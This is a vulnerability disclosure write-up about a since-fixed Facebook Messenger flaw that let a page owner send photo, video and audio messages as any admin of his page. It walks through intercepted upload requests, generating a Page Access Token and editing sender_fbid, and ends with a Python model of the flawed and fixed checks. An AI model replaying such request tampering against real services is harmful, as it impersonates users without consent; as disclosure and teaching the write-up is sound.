Published On: 19 May 2019
An attacker was able to send media messages on behalf of other users on Facebook Messenger by making the victim an admin/editor/moderator on his Facebook Page. The attacker then intercepts the request Messenger sends while he uploads a photo/video/audio to someone, changes the token in the Authorization header to a "Page Token" and changes the sender_fbid to the victim's (admin) id.
This could have allowed a malicious user to send media messages on behalf of other users simply by making them (the victims) admins on his page.
Step 1: Setup
Step 2: Intercept Requests
The attacker can capture these requests while sending an image/voice/video in Facebook Messenger (Android/iOS).
Just focus on the Authorization header and the parameters sender_fbid / to:
POST /messenger_image/3e8cde28c9b2d9112e9c87af9b71fbc56528664348207412316 HTTP/1.1
Authorization: OAuth EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphk.........DgWUkgTUyMBUvs
original_timestamp: 1556554877552
sender_fbid: victim_id
to: receiver_id
Accept-Encoding: gzip, deflate
or
POST /messenger_video/83e5ecba32f23sfd09a99f33b96529102120235284153 HTTP/1.1
X-Entity-Name: VID-20190430-WA0150.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/212.1.0.13.109;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
Authorization: OAuth EAAGNO4a7r2wBAJJXT1VkfYFfwdf9ZCpSxfcGpfi3azopoTlEvYEZC3639cIVmKefBhvKXadoD17GMt7t3Xx.........eTfcjUHvQZDZD
media_hash: 4dc51a78fd7e39ab3369ddd3873d4d1794b499621a1bd48d867c05c1a6ce65a5
X-FB-Net-HNI: 41503
attempt_id: 6529102120248812254
send_message_by_server: 4
app_id: 256002347743983
Content-Type: application/octet-stream
offline_threading_id: 65291021202332323
X-FB-Connection-Quality: GOOD
sender_fbid : victim_id
to: receiver_id
X-FB-SIM-HNI: 41503
or
/messenger_audio/a174a21348fb713ab40a796e63232fs0986529693648684848294 HTTP/1.1
X-Entity-Name: USER_SCOPED_TEMP_DATA_orca-audio-1556800271887.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/212.1.0.13.109;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/touch;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
duration: 9811
Authorization: OAuth EAADo1TDZCuu8BANUYHkTMK4SxtTRPbqtIgIuUShTWmsHujjEVIRELxlk5eiZCnA36hSgKl9gjjFJlmuMH3KYy6DlGOhojRZCDHjBZAyMEw0gLut6V4dEFaViofLKELJENiBBjW8SmMZCRho0A6Fq9ZBKXVIuf8nGPZAywnaqjunqwZDZD
X-FB-Net-HNI: 41503
attempt_id: 6529693648683742874
sender_fbid : victim_id
to: receiver_id
Step 3: Generate a Page Token
Kassem (the attacker) changed the token in the Authorization header of the request to his "Page Token", by taking the token from the previous Authorization header and generating the page token via the Graph API Explorer.
To get the page access token, send the following request (ACCESS_TOKEN = the token for Facebook Messenger taken from the intercepted request):
GET /v3.2/page_id?fields=access_token
This request should return:
{
"access_token": "EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphkkZBv15yb7FNy357AcxAtjZCSrjFkL35muO3h3dZB2zlSZBOiS.....",
"id": "page_id"
}
So replace the token in the Authorization header with the new one.
Note: You should generate a "Page Token" for a page where both you and the victim are admins.
Step 4: Change the Parameters
After changing the Authorization header to the page token, I was able to send media messages on behalf of any admin of the page: the server didn't check whether this token belonged to the admin named in sender_fbid :) It only validated that the user has a role on the page the token belongs to, and never checked who generated the token!
So let's change the parameters now :)
sender_fbid: the parameter that indicates which user sent this message (sender id). Change it to the victim id (admin id).
to: the parameter that indicates who receives this message (receiver id).
Step 5: Send
Finally, send the request!
Boom!
I sent the message from the victim account (Semi colon) to myself!
I can also send the message to any other user, not only to myself!
Imagine someone sending a message from your account to another user!
Step 6: Proof
This is an example of how I sent a message on behalf of my friend (of course I got his permission before testing on his account).
Facebook fixed the vulnerability by preventing any user from using the "Page Access Token" to send messages on behalf of any admin, including your own account, so a page access token can only be used to send messages on behalf of the page itself. New server reply: {"err_code":"1545003","err_str":"You cannot perform that action."}
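To make the root cause in step 4 and the shape of the fix concrete, here is an added model of the server-side authorization check (example code written for this page, not Facebook's code; the ids page_777, attacker_100 and victim_200 are constructed). The vulnerable check only asks whether sender_fbid has a role on the token's page; the fixed check requires the token's own subject to be the sender, so a page token can only send as the page.

```python
"""Model of the authorization decision behind the Messenger media-send endpoint.

Constructed example: ids and roles below are hypothetical, not real accounts.
"""
from dataclasses import dataclass

# Constructed sample data: one page with two admins (attacker and victim).
PAGE_ROLES = {"page_777": {"attacker_100", "victim_200"}}


@dataclass(frozen=True)
class Token:
    kind: str       # "user" (Messenger token) or "page" (Page Access Token)
    subject: str    # user id for a user token, page id for a page token
    issued_by: str  # the user who generated the token


def vulnerable_check(token: Token, sender_fbid: str) -> bool:
    """Behaviour described in step 4: a page token is accepted for ANY
    sender_fbid that holds a role on the token's page. The issuer of the
    page token is never compared with sender_fbid."""
    if token.kind == "user":
        return token.subject == sender_fbid
    return sender_fbid in PAGE_ROLES.get(token.subject, set())


def fixed_check(token: Token, sender_fbid: str) -> bool:
    """Behaviour after the fix: the token's subject must equal the sender.
    A page token therefore only sends as the page itself, never as an admin."""
    return token.subject == sender_fbid


def send_media(check, token: Token, sender_fbid: str, to: str) -> dict:
    """Run the chosen check; on rejection return the server's error reply."""
    if not check(token, sender_fbid):
        return {"err_code": "1545003", "err_str": "You cannot perform that action."}
    return {"status": "sent", "from": sender_fbid, "to": to}


if __name__ == "__main__":
    page_token = Token("page", "page_777", "attacker_100")
    print(send_media(vulnerable_check, page_token, "victim_200", "attacker_100"))
    print(send_media(fixed_check, page_token, "victim_200", "attacker_100"))
```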